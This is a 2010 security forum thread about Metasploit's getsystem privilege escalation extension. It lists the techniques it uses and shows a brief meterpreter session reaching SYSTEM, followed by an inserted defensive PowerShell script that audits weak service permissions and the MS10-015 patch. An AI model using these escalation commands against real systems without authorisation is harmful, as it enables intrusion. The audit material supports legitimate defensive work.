
Getsystem privilege escalation using Metasploit


Jhaddix

Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Mar 15, 2010 5:52 pm

Getsystem privilege escalation using Metasploit

Sorry to spam the posts guys, I just thought people would like to read these.

Videos are at the bottom link:
A few weeks ago Chris Gates (aka Attack Research/Carnal Ownage/ethicalhacker.net) and Joshua Gauthier showed some quick snippets of Metasploit's Getsystem extension. Getsystem is Meterpreter's new (Windows) privilege escalation extension used in the priv module.

Getsystem uses several techniques for priv escalation:

    * Windows Impersonation Tokens (fixed by MS09-012)
    * Abusing LSASS via token passing (Pass-the-Hash), which requires Administrator anyway.
    * Exploiting weak permissions (read and write) in the services (most of them by default run as SYSTEM; if you are lucky they run as a domain administrator).
    * Improved KiTrap0D exploit released by Tavis Ormandy (MS10-015, patched as of now)

As more privilege escalation exploits appear this year they will no doubt be rolled into the Getsystem extension, which I will be keeping a watchful eye on. Thanks to Stephen Fewer for adding the new functionality to Getsystem.

Also, check out Bernardo Damele’s (author of SQLmap!) walkthrough on integrating Metasploit privilege escalation via SQLmap for post database exploitation. Here.

And a sample of the KiTrap0D exploit below in MSF by Pieter Danhieux (not Getsystem but same functionality):



KiTrap0D in Metasploit 3.3.4-DEV

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to '0').
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


http://www.securityaegis.com/getsystem- ... etasploit/
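A practitioner's note on the help text quoted above: techniques 1 to 3 are all marked "Admin", so they only take an existing local administrator token to SYSTEM; technique 4 (KiTrap0D) is the only one marked "User", and it is exactly the one MS10-015 closes. The two things worth checking on a host before or after such a test are therefore whether that update is present and whether any service is reconfigurable or rewritable by low-privileged accounts (the "weak permissions in the services" bullet). The PowerShell below is an added example written for this thread; it is not code from the post, from securityaegis.com, or from Metasploit. It assumes sc.exe sdshow is readable by the current user (the default), that KB977165 is the knowledge base article MS10-015 shipped as, and that the four SIDs in $LowPrivSids are the principals you care about; the function names are this example's own.

```powershell
# Added example (not from the post, not Metasploit code): audit the two
# getsystem-relevant conditions that can be checked directly on a Windows host:
#   1. services whose DACL grants low-privileged principals rights that let them
#      reconfigure the service or rewrite its binary (weak service permissions),
#   2. whether KB977165, the update MS10-015 shipped as, is installed (KiTrap0D fix).
# Assumption: sc.exe sdshow is readable by the current user (default on most systems).

# Principals a non-admin attacker controls or belongs to. Extend as needed.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

# Service-specific and standard access rights (winsvc.h / winnt.h) that hand
# over control of the service or of its security descriptor.
$DangerousRights = @(
    @{ Mask = 0x00000002; Name = 'SERVICE_CHANGE_CONFIG' },  # change binPath / run-as account
    @{ Mask = 0x00040000; Name = 'WRITE_DAC' },              # rewrite the DACL itself
    @{ Mask = 0x00080000; Name = 'WRITE_OWNER' },
    @{ Mask = 0x10000000; Name = 'GENERIC_ALL' },
    @{ Mask = 0x40000000; Name = 'GENERIC_WRITE' }
)

function Get-DangerousRightNames {
    param([int]$AccessMask)
    $DangerousRights | Where-Object { ($AccessMask -band $_.Mask) -ne 0 } | ForEach-Object { $_.Name }
}

function Get-WeakServiceAces {
    param([string]$ServiceName)
    # sc.exe sdshow prints the service's security descriptor as an SDDL string.
    $sddl = (& sc.exe sdshow $ServiceName 2>$null | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne 'AccessAllowed') { continue }
        $sid = $ace.SecurityIdentifier.Value
        if (-not $LowPrivSids.ContainsKey($sid)) { continue }
        $names = @(Get-DangerousRightNames -AccessMask $ace.AccessMask)
        if ($names.Count -gt 0) {
            [pscustomobject]@{
                Service   = $ServiceName
                Principal = $LowPrivSids[$sid]
                Finding   = ('ACE grants {0} (mask 0x{1:X8})' -f ($names -join '|'), $ace.AccessMask)
            }
        }
    }
}

function Test-WritableBinary {
    param([string]$PathName)
    # Pull the executable out of a quoted or unquoted service command line.
    # (An unquoted path containing spaces will not resolve here and is skipped.)
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    else { $exe = ($PathName -split '\s+')[0] }
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { return $false }
    $writeBits = [System.Security.AccessControl.FileSystemRights]::WriteData  # also set by Write/Modify/FullControl
    foreach ($rule in (Get-Acl -LiteralPath $exe).Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        try { $sid = $rule.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($LowPrivSids.ContainsKey($sid) -and (($rule.FileSystemRights -band $writeBits) -ne 0)) { return $true }
    }
    return $false
}

function Invoke-ServiceAudit {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        Get-WeakServiceAces -ServiceName $svc.Name
        if ($svc.PathName -and (Test-WritableBinary -PathName $svc.PathName)) {
            [pscustomobject]@{
                Service   = $svc.Name
                Principal = '(file ACL)'
                Finding   = "binary writable by a low-privileged principal: $($svc.PathName)"
            }
        }
    }
}

function Test-MS10015Installed {
    # MS10-015 (the KiTrap0D fix) was distributed as KB977165.
    return [bool](Get-HotFix -Id KB977165 -ErrorAction SilentlyContinue)
}

if (Test-MS10015Installed) { 'KB977165 (MS10-015, KiTrap0D fix) is installed' }
else { 'KB977165 (MS10-015) not found; KiTrap0D-style escalation (getsystem -t 4) may still apply' }
Invoke-ServiceAudit | Format-Table -AutoSize
```

Any row returned by Invoke-ServiceAudit is a service a standard user could repoint (SERVICE_CHANGE_CONFIG), re-ACL (WRITE_DAC/WRITE_OWNER) or overwrite on disk, which is the condition the third bullet above describes; a clean run plus KB977165 present leaves only the admin-to-SYSTEM techniques 1 to 3 available to getsystem.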

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Mar 15, 2010 6:03 pm

Re: Getsystem privilege escalation using Metasploit

Jason, thanks for the post, that's very good to know.  Do you know if that module is native to MSF 3.3.4 DEV?  Or is that available in other versions as well?
~~~~~~~~~~~~~~
Ketchup

Jhaddix

Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Mon Mar 15, 2010 6:04 pm

Re: Getsystem privilege escalation using Metasploit

It's now available in the trunk =)

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Tue Mar 16, 2010 1:52 am

Re: Getsystem privilege escalation using Metasploit

Definitely a great new feature added into the meterpreter. I've got to toy with this one sometime. It's getting to the point where they're keeping this framework so up-to-date with goodies that I haven't gotten a chance to try out some of the newer features. I remember wishing I had it a few months ago when I was running client-side exploits on my Vista machine. Great post!
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
